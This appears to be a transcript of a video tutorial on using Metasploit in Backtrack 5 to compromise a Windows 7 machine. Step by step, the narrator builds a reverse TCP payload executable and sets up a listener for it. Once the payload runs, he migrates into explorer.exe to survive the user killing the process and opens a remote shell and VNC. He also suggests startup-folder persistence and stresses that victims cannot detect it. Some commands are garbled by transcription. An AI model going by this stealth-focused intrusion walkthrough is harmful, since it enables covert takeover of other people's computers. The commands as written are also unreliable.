Hi guys, welcome back to your second lesson in Backtrack 5 R3. In this lesson we're going to actually be learning how to exploit Windows 7. I'm going to be using Windows 7 64-bit, but this works on the 32-bit version as well. And we're going to be learning about the basics of Backtrack 5. So what we'll be doing is we're going to be creating an executable file which will try to connect to our Backtrack 5 machine. The payload we'll be using is called reverse TCP, which means our Backtrack 5 machine will listen for the Windows 7 machine trying to establish a connection. From there we can execute commands from the Backtrack 5 shell machine, so we can open up a shell on the Windows 7 and it'll be completely undetected. So now you're wondering, what the hell am I on about? So a payload is a file that runs after the exploit on the target machine has been ran. So when we have established a connection, our payload, which is going to be reverse TCP, will run on the machine. An exploit is something that can be taken advantage of. It can take advantage of a bug, a glitch, or a vulnerability. In this case it's the ability to send TCP connections back to other computers using reverse TCP. Now, reverse TCP is the payload name. Transmission Control Protocol, otherwise known as TCP, is one of the core protocols of the Internet Protocol suite. So we're going to get started. So here I have Backtrack 5 and a Windows 7 machine side by side using VMware Player. These are set up so each of these computers have an individual IP. So for example this one, if I open up a terminal and type in ifconsole, ifconfig even, this is pretty much ipconfig, and it shows me what the local IP address of this machine is. So that's 192.168.17.13, and if I open up the CMD on this machine and type in ipconfig, the IP address of this is 192.168.17.144. So we're going to be exploiting this machine. Don't worry about deface.html, that's for another tutorial which we'll be getting onto. Anyway, so what we're going to be using is something that's an exploit that's built into Backtrack 5 called Metasploit even. And you can find this under the exploitation tools, network exploitation tools, and Metasploit framework. And you can get it by going MSF console or opening up a terminal and typing in NSF console. This will take a while to open up. Okay, so now we are working inside the MSF console, and this is what we're going to be doing our exploiting and payloads on. So when we use, I'm going to just basically give you a quick tutorial on MSF console. So if we do search and put Windows, it'll search through anything to do with Windows. So you'll see on the side here, if I'm just going to make this full screen like this, and make that full screen, you can see there's lots of different exploits here: Windows Gather, Terminal Server, and blah blah blah. So I'm just going to type clear, and if I type in show exploits, it's going to show all the exploits we can run from inside MSF. So that'll take a while to load them up as well. And these are all the different exploits we can run in MSF. So there's lots and lots of different ones. And if we type in show payloads, if you remember, a payload is something that runs after we've initialized an attack. These are all the different payloads we can use. So I'm going to type clear, and the exploit we're going to be using for today is use/exploit/handler/ multi/handler. And then we're now working inside the handler exploit. And if we type in show options, we can see what we need to change. So if I put info, it shares what kind of description it is. So the module is a stub that provides all the features of a Metasploit payload system to exploit that has been launched outside of the framework. So what this means is it's going to make an exe file, and we're going to put this on the Windows 7 machine. So what we need to do first is do set lhost. So now we're configuring our exploit, so that when we connect to, when the Windows 7 machine is being exploited, it's going to connect back to this. So lhost means local host, and we're going to do set lhost and then the host IP, so the backtrack IP. So if you don't know how to do that, just do ifconfig, case sensitive, ifconfig, and this is the IP, the inet address. So I'm going to copy that, and I'm going to paste it in, and then that's set the L host. So then we're going to set the port. You don't have to worry about port forwarding if you're doing this over a network. If you're doing this to an 86 IP, for example, then you're going to need to port forward. So I'm going to set the L port, listening port, set L port to, it's all case sensitive, so 4321, that's going to be the L port. And then we're just going to minimize this, and we're going to open up a new terminal. And now we're going to build our exe file. So we're going to do msf payload windows / Metasploit / reverse TCP. So this is our reverse TCP payload, where they're going to say what port, what IP and port to connect back to. So lhost equals 192. I think I've got this in the clipboard, so I'm just going to paste it in. And the L port, which is the same port, so it's 4321. And then we're going to say save this in the root directory as attack.exe. I'm just going to press enter and let that build. Now we're going to go back to our original terminal, and we're going to do set payload, and it's going to be the same payload that we just built in the exe file. So that's the reverse TCP one. And now we're inside that exploit. And now we just have to wait for this to build, which it has. So if I go to places, home folder, and you see that we have attack.exe. So I'm just going to put this side by side, and you can literally just drag files across in VMware Player. So now attack.exe is on this. All we're going to do is just go back to our main console where we set the payload. And then the victim will execute attack.exe, and all we're going to do is type in exploit, and then we're going to connect, so it's sending a stage, and we are now connected to this machine. So if you type in help, it will show all the different commands we can use. And to prove that I'm inside this machine now, I'm just going to type in run VNC, which is the virtual remote desktop feature. I'm going to make this full screen, and I'm going to prove to you that we're now connected to that Windows 7 machine. And you'll see that this has opened up a VNC. And if I put this here, you can see that when I move my mouse, I'm just going to have to make this side by side again. See that my mouse is moving on both of these. So we're connected to this machine. Then what can we do? So if we type in help, we've got lots of different things that we can use. So I'm just going to teach you about the processing and migrating and shells. So all the user has to do to get rid of this is task kill the TCP client. So attack.exe, all you have to do is task kill that, and then we won't be connected anymore. So what we're going to do is type in PS, which will show all the processes, and each process has an ID. So what we're going to do is migrate to one of these other processes. So we're going to basically say that you can kill this task if you want, but we're going to be attached to a different process. So we're going to use winlogon. You want to use something that they're not going to task kill. So process ID is 460, and all I'm going to do is type in migrate and 460. And that's because if I just go to Windows 7 quickly and show you this, winlogon isn't used by the user jack, and since the attack.exe is running under the user jack, we can only migrate to processes run by that user. So we're just going to use explorer.exe. So that's 1400. Migrate to 1400. So that might take a while to migrate, and it'll say migration completed successfully. So now the infected computer can end task this, but I can still take control of this guy's computer because we are now listed under explorer.exe. So what else can we do? I'm going to type shell, and this will drop me into the CMD of that machine. So I'm going to do cd slash, I'm going to navigate to the C drive. Well, I'm going to try anyway because there's no slashes. And then I'm going to go to the users, to the jack, to the desktop, and I'm going to create a file. So I'm going to put boobs. I'm going to say this is boobs.txt and press enter. If I go to this machine now, you see that boobs.txt is on the screen. And I can delete this as well, so if I do del boobs.txt, see that this is now gone. So we're controlling this computer from a different computer, and this is basically what the exploit does. And if you wanted this so that when they started up you could copy attack.exe to the startup directory, but there's no way you can tell that we are controlling their computer apart from seeing the .exe is opened. And then I'm just going to finish the tutorial by shutting down this computer, so I'm just going to do shutdown. So I'm just going to do a side-by-side comparison of this. So shutdown -s, Windows will shut down in less than a minute, and that brings an end to this tutorial. So we're going to move on to some better exploits next. The next exploit we're going to be doing is on Windows XP Service Pack 2, and I'm going to have a link to that in the description because it was quite hard to find. But this is completely hidden and it's really vulnerable to being attacked. We can get right in their machine and they don't even know it. So that's what we're going to be working on next tutorial. Thank you for watching. If you have any questions, please just write a comment in below. Thank you for watching. Please like, comment and subscribe, and I'll see you again.